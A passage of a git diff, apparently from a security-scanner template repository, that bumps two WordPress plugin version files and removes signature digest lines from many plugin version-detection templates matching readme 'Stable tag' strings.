http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 202 files changed, 2 insertions(+), 202 deletions(-) diff --git a/helpers/wordpress/plugins/elementskit-lite.txt b/helpers/wordpress/plugins/elementskit-lite.txt index a4f52a5dbb..0444f32076 100644 --- a/helpers/wordpress/plugins/elementskit-lite.txt +++ b/helpers/wordpress/plugins/elementskit-lite.txt @@ -1 +1 @@ -3.2.0 \ No newline at end of file +3.2.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-fastest-cache.txt b/helpers/wordpress/plugins/wp-fastest-cache.txt index 5975b143a0..434dcac4fa 100644 --- a/helpers/wordpress/plugins/wp-fastest-cache.txt +++ b/helpers/wordpress/plugins/wp-fastest-cache.txt @@ -1 +1 @@ -1.2.8 \ No newline at end of file +1.2.9 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 066e4001bc..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201a0cb2289816c51f7d36609c737196ba9a1de7ca813f2e1c9361b6c34bf4de9f022100ddf473616f26f1f04152d8036ebbf20764f2e91b969c6b3e1f54409dc1abebb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 90dc755365..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009528fd2c65974432e6f8ff3697d8719250ac544be7e171cf685615b506b9b69d0221009b9d0ff3a696228306574998d4a26ff3c5368cff1d838c45555adf6f75e10d9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 504e97ec62..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220057ea8832bdc60d651f2654347529120ffd352f18002fcabb2756795fc12eee20220200fade18948114ad83c81847a1057882b4b58f25ac2491bf2588bad2125fdf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 721e9eb64e..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022001982ddbab3738ad1af4fd6d3e56375d33cb8e0a20eecba41d6ecc58e9f34999022100fa06ddd8f8181b3d733d09c42483fe69582171845ede52f76443e14e6964e1f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index b277969d45..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f2695462fb853c9b01b1fa9c062bc1121bd7d95154f44d8537574f36b96e0b87022100fc9614d4d9b67ae0285cf7b3bb1ae0d90a693221e74c1777c561a2613e5760f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 765cb1bf1c..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c6a12b9f233708e392ad44588610edc52d0827438ca0e213e34dc1fd5ddca4f702210082d613b28f2a1db85b1e68df6c70c6163d58e3c992655ad6e3e33ae91e2e0444:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index bd455711b4..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008874122a4bf0f3c5953fd919733113711ee88e4aa73b2922206e2168a99ca005022100d778ab6bbb0d85b2cb9a8f63be94fb04bfa5c68aa2a857d1e645f7c7c630ca9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index e33bd20e13..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220239d566a18761cd95a4238081fe8aa9428ee67b734e8e6a5674432b1c0b4f162022100cb59f217b5dd088af2b2398ca68838c9c4a7fd9d8dc7163502a478b1a82ff70a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 321a670128..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210086b860ddcc5181903f1c83a2e9c28bcba6613216e9a85d47c57dff855477be6f022001cab48543e5e972bb7d3c89c2135d6670aada07dcd939ce538a2621ecbcf583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index dc52461164..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100856786cfd664461b6f5cf373bd622ae4cd4f2fd25446c276801dc27d13dac1be022100e4559f028ce3ea893fedc8a1c6f909e323d3dfa2032da8a207300ef4e0b391b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 718e001cdc..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100988dfa0f3147880459aff2eb4db8397ad8c20d780da0b6dded3d49bb3855f8d6022070b8dd9c1c6aabb463ac5d1d55fc85395de93a12a2d9dc97f8b89717b2137c47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 94ed2587b8..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100eea0c35055952c71bca538bb2820c12cfcc5449eca2f21d123e988b28804fdba022100f2db4befa6d71c0518bb22603718e1d283bb5a79449a78fd19d5a5565124864a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 7801b47b2c..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022021e60243d14264e9dba8ea688de5b3474409961c36bceb3ecfc09171bcafd475022100c33014209c734b729eeaaedc749e5e5ea456b8648aaee1b987eb3f8ad83bec59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index de4a3b8ddb..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022038dc6e4638b425b5c25976c6a1ea2bbfebec41f45b353b081972a9314b8fe2a102202d51ccf11bdfb224f3e4caedd48da06c7c85373f3fa0944e5e8b11020a54e677:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index c56781aac8..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100833b1ffc11abade5c875fce3d07c63d9df43fd821f22d95314ff3d7276191e71022100892462b0364fece5d18dc06cf1bfd3ff5c808c56ad0581a0e134dd3f4a7989c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 2480f3a0c0..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022014a7654a0343a4db574d42a785f280296cf6ac3b8e7133be43cab8809ebcaa78022100aebe35821a8eaeddd05714b5badf8de012cf8b882f6e243c736bad9b827af5d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 14b6b44810..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009be4d87621bc01277bdaaadc7a98c3d6f17f072f80f98a6df235908e3a957b2e022043dff2aa121f603f99e8d25ad5038dc3c48dd212374ba02be929e36d2d3dd4ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index d79ddfaf48..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202e39b2756daa59459c406d092c2c75393051516742ac57f8b488f8c9ff392945022100a452e401c81268b1a0f861b68bbfbe4761ec17e15f5b49dc09baead17ee5c8c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 0d9b1fa0c8..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210088b6b1abdee2eeb78ffbaf5802926921bf60e1eeff3a0551f56876d1d5d6523902203335beb0338c0be9d89d2dfd72bb400e2fe7c2f2c8301753a8501f2a88e26c0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 7a0487e1b2..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a7578a7d3a717a899ce4f9e68823c4fe2aaaddbd1f34c96af5d0198f6537db10022078beba8ef443b4a45287dcc0fda1a6d4ebab34ca9d94e51c7128a608dcf6bb7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 92f9afe25d..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220638358339c4bd7bdb22bb16f4e48bdedb5ebaa09f530f4eef9ba390fc8ab0cf00220446285b50faf2fb5f563b6202b2701f99d86a38f88b499b59861a41c1914a5cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 0bbf526470..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220320b80bf745b19c3e372f9c5729446ce6ba6d179f7d6d7d7704ebbcd9f846604022100fa9f57fa8b46ea6ff9641156123fae1d71ab7934201c4dc7d0f50bbcc639c2d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 1eabc28f82..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220086facc27f54576458d73621d1b49613bac1f7f44f41dd64686719ac0f068a69022038fd3e84b686a03cc9156372c01518580bf5d1b9ed8b98068d0e89144e5c8766:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 5517c15527..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220175125395811df3f8fab5a00d2a2ca40390bc8fad3cc441415ebb673eb887776022100d6f98a488d6ed79e29b987c843216f147cb2ae39901a6500b8c5248d4be0cc2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index a4f7a4644f..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eb18f314edf4b8bfdd9fb367ef987fee5cf20881c7566c20484a1b6acb526ed9022057aca81b080ddd34025d3c7b8690c7808205a0f87c20e72b7fda1575bc5a61cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index cba3cd185e..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207e29b389eb4881a631ca421177286f3b0ac9b8e4cf21b80093357e36a0a8a9db0221008c06804f5185e8fdb7b40e02891a07e6fb11e43f2f844d4487ca85b6fa8a0997:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index ed6c79a1fd..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100958bf73766039f8ad668aead372f2e35e6e48afbd4b687c4d0a44d929112af47022100dabe7f376b59c3a98305052cbdba06aaa9491ff143a77c9f80bac41c2a1227e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 39ae5a327d..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210082a9f28167351c924ddb746f67827480228856ccb5f1bfb83263c1809fafa16c0220077f16f52851cf2db2617fde87d0530b80241743619242b990689651aea9302c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d6d40bf3c2..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204f664283df35c44b120a73056eaa98b86dc4f2124c5105540fad59d64210572e02201140b396774514c382e105dc00ad3e7be5d493a18ee36a8e0a014c4cfd356ee7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index dfc31222b6..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203f0aac20584ec48b1778b28b0362efb1f75c9ebc044e2a8ce9f36b40315c3e02022100feba53a208d9415687de52a7cedf45dc178f9b75703ce2c6d84a61bf15b8789c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 0089b9f62d..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fba7f95278217ef3891342f77e1552ea7ddde5fb40cef67b66cd6b9f50c2798a02207ff26bcc58aca7769556d99a7c1f4c9acdb05628f3a93dce4f314073f420a239:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 1d191afa7a..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206ab50fcbc6f603b20bd69f28cb49520f9d0c542b24aff300e6143e3ac4f757e6022028160f9ccfb2e99430ba7769ddcaee074959b2e9e5e9ba931a7c14db541f3643:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 7a05272abc..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ac2916f526cfb8184b2fb67b3496295cd5f0554ee7ebc1881ffb18c993a87f2f022064c3c5fa539c83533ca36eecbe03122987c5727bb0faf09991d38a2154ad78a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 9f7c483ee5..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ee989f0277e7887d0abd7c2245e303fef1f01fbd90e271d1cc759a23c96a9ebe02204b5707d27627158436d4f841a4a9d367b0d8eee1108e436a5ce88794a8e5c7d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 5acc9e1d2d..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022066418ed3615ad26f9c809dd9905d0069c80d7d7e48e227e9a28bc4a235eae8b802201b6956684bf340f20579a916c355d78206cd60717901a9ed3c625951a458b8b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 38ec8f91b4..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ac36578b95d5687bc794ab64933fda9d8c80eb6ffd900f49dc3dbdda867c5053022100af01f6e6bf8d8f3f2284661ac78489ef0940cded8a041829b34d4b34aaebd2c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index af5cb35bac..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205bd41888b5090f9af1a5408d752a5ef273305bb356a2022a297cfc948b804fd4022100e4e701e44b3406daae332989d983e78cf2c247dc5b67a22f1a6f976e3e25e770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 5cfc6fb36a..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f5ec5f75c69553bfc64c4f8d5cbe76f19949e62096371e78d4aeeb9630c1ea6402206886d9387a06e90e967a3356656e32660e65eb86b4f13673726aa87dcfe4a0dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 0d72d49e36..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220660af0774476724f84fa679fd2017d2596459e9559dcde6b75a9aa47d74dd9f4022100dd481033cca0ae8da25204b55b7b22945eed0c2fca563ff7667985c4b88dd681:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 809237f5c0..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022036b77972c7dee251d6e25ff0abb314f6e348325d57ad4bf23aef8cb35e024817022021df0d8e2525884182b898e8cd497ec04ec592d6a9b6e954a77d49ed04c2344e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 905d11b962..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205dbb1653347fb86864153815e7d0c19d636ba7b1bbcf394892c73bc1ae6de9d2022007e89944f1c871e8dd94d399340a105a49c614812282a72dc8e04efbf20eef5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index b1dc499ecd..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203b93093b3c42ea7ccf5c6d65f9befe54fe36781a1d3e1cea005e50415a5355f602207cd07adc1be4e6e7191c49bb03a566299f00e14e12e8665e00f588a50cbe502c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index ca6ed62d21..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206af71ff66f99d9fb6e808127d6c7df3f34b472df97645af13a2a69542c8813f3022100a72b69cf766fb819604635c3819d3f79b224adf1f8d1d96f11dc25922cca3a48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eb18999742..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 